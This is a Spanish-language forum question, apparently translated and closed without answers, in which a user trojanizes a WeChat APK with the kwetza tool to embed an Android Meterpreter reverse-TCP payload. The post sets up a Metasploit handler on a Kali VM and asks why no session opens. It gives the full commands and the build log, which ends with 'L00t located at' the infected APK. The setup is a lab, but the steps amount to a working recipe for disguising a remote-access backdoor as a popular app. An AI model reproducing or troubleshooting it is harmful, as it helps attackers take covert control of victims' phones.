Metasploit: explotar no iniciar la conexión con el controlador [cerrado]

1

Estoy usando un VirtualMachine de Android 4.4 y un Kali Linux 2018.4 VirtualMachine.

Red de Lan:
Kali VM: 10.0.0.27
VM de Android: 10.0.0.29

Hice un .apk de la aplicación WeChat con kwetza en Kali:

git clone https://github.com/sensepost/kwetza.git
mv /home/xyz/Downloads/wechat.apk to kwetza directory
python kwetza.py wechat.apk tcp 10.0.0.27 4444 yes

Luego subí el wechat.apk recién creado ubicado en wechat / dist / wechat.apk a mi VM de Android en / sdcard / Downloads

En Kali, lo hice:

use exploit/multi/handler 
set payload android/meterpreter/reverse_tcp 
set LHOST 10.0.0.27 
set LPORT 4444
exploit

Instalé la aplicación en mi máquina virtual Android y la inicié

Pero mi stdout es:

Started reverse TCP handler on kali_ipaddress:4444

Y no tengo Starting payload handler...

¿Puede alguien ayudarme?

ps: Tengo exactamente el mismo problema en un Parrot Security 4.3

    python kwetza.py wechat.apk tcp 10.0.0.27 4444 yes output was :

[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.0.0.27
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING TCP COMMS
[*] ANALYZING ANDROID MANIFEST
[*] USING CUSTOM ACTIVITY: AssistActivity
[*] PREPARING PAYLOADS
[*] INJECTING INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMISSIONS TO BE DONE!
[+] TIME TO BUILD INFECTED APK...
[*] EXECUTING APKTOOL BUILD COMMAND...
[+] BUILD RESULT
#####################################
I: Using Apktool 2.3.4-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes9 folder into classes9.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes6 folder into classes6.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes4 folder into classes4.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes7 folder into classes7.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes5 folder into classes5.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes8 folder into classes8.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes3 folder into classes3.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether resources has changed...
I: Copying raw resources...
I: Copying libs... (/lib)
I: Building apk file...
I: Copying unknown files/dir...
I: Built apk...

#####################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
#####################################
jar signed.

Warning: 
The signer's certificate is self-signed.
The MD5withRSA algorithm specified for the -sigalg option is considered a security risk.

#####################################

[+] L00t located at /root/Documents/kwetza/wechat/dist/wechat.apk
    
pregunta White Bomb 25.11.2018 - 18:51
fuente

0 respuestas

Lea otras preguntas en las etiquetas